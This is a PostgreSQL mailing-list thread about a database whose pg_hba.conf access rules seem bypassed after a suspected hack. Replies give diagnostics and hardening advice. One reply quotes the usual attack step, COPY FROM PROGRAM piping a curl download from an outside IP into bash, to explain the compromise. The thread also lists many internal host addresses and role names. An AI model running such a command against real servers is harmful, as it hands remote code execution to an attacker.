> Have checked select * from pg_hba_file_rules results are consistent with pg_hba.conf > any ip and user still can login in db
Any proxy? port/ip - forwarding running in the background? in the next time check the "client_addr". - SELECT usename, client_addr FROM pg_stat_activity where client_addr is not null ; > a Postgres DB that was Hacked l > When I remove pg software and reinstall pg software I agree with others; - please re-install the full system! ( not just the PostgreSQL! ) Usually, the attack sequence: - open port, brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash'; so you can expect "anything" installed and running hidden in the background. https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0 (2020.Mar ) https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/ > host VJ VJ_USER 10.10.10.1/32 md5 imho: - use different ports - change "md5" to "scram-sha-256" - maybe: add https://www.postgresql.org/docs/10/auth-delay.html - for administrating use SSH tunnels: https://www.postgresql.org/docs/10/ssh-tunnels.html ( and use a firewall - for closing all external ports or use SSL ) Regards, Imre shing dong <s7eqs...@gmail.com> ezt írta (időpont: 2021. dec. 23., Cs, 11:15): > Your original post stated that you only had >> host VJ VJ_USER 10.10.10.1/32 md5 >> in the pg_hba.conf file. >> However the result of the select is considerably more ? > > > > DEAR > > I have tested this feature , only had > > host VJ VJ_USER 10.10.10.1/32 md5 > > in the pg_hba.conf file > > Have checked select * from pg_hba_file_rules results are consistent with > pg_hba.conf > > any ip and user still can login in db > > When I remove pg software and reinstall pg software , the function of > pg_hba is working ,represent that the location and content of > pg_hba.conf are correct > > Suspect that the function of pg_hba is destroyed? > > > > > > > > > > > Dave Cramer <davecramer@postgres.rocks> 於 2021年12月22日 週三 下午6:58寫道: > >> >> >> On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs...@gmail.com> wrote: >> >>> *Dear Dave * >>> >>> The result after reload is >>> >>> 2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 >>> 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration >>> files",,,,,,,,,"" >>> >>> No other error message >>> >>> ------------------------------------------ >>> >>> result of select * from pg_hba_file_rules >>> >>> >>> >>> line_number,type,database,user_name,address,netmask,auth_method,options,error >>> 84,local,{all},{all},,,md5,, >>> 86,host,{all},{all},127.0.0.1,255.255.255.255,md5,, >>> 87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,, >>> 88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,, >>> 89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,, >>> 92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,, >>> 93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,, >>> 94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,, >>> >>> 95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,, >>> >>> 96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,, >>> 99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,, >>> 100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,, >>> 101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,, >>> 102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,, >>> 103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,, >>> 104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,, >>> 105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,, >>> 106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,, >>> 107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,, >>> 108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,, >>> 109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,, >>> 110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,, >>> 111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,, >>> 112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,, >>> 113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,, >>> 114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,, >>> 115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,, >>> 116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,, >>> 117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,, >>> 118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,, >>> 119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,, >>> 120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,, >>> 121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,, >>> 122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,, >>> 123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,, >>> 124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,, >>> 125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,, >>> 126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,, >>> 127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,, >>> 128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,, >>> 129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,, >>> 130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,, >>> 131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,, >>> 132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,, >>> 133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,, >>> 135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,, >>> 136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,, >>> 137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,, >>> 138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,, >>> 139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,, >>> 140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,, >>> 141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,, >>> 142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,, >>> 143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,, >>> 144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,, >>> 145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,, >>> 146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,, >>> 147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,, >>> 148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,, >>> 149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,, >>> 150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,, >>> 153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,, >>> 154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,, >>> 155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,, >>> 156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,, >>> 157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,, >>> 161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,, >>> 165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,, >>> 168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,, >>> >>> >>> >>> >> >> Hmmm for some reason I did not reply to the list. >> >> At any rate. >> >> Your original post stated that you only had >> >> host VJ VJ_USER 10.10.10.1/32 md5 >> >> in the pg_hba.conf file. >> >> However the result of the select is considerably more ? >> >> >> Dave Cramer >> >>>
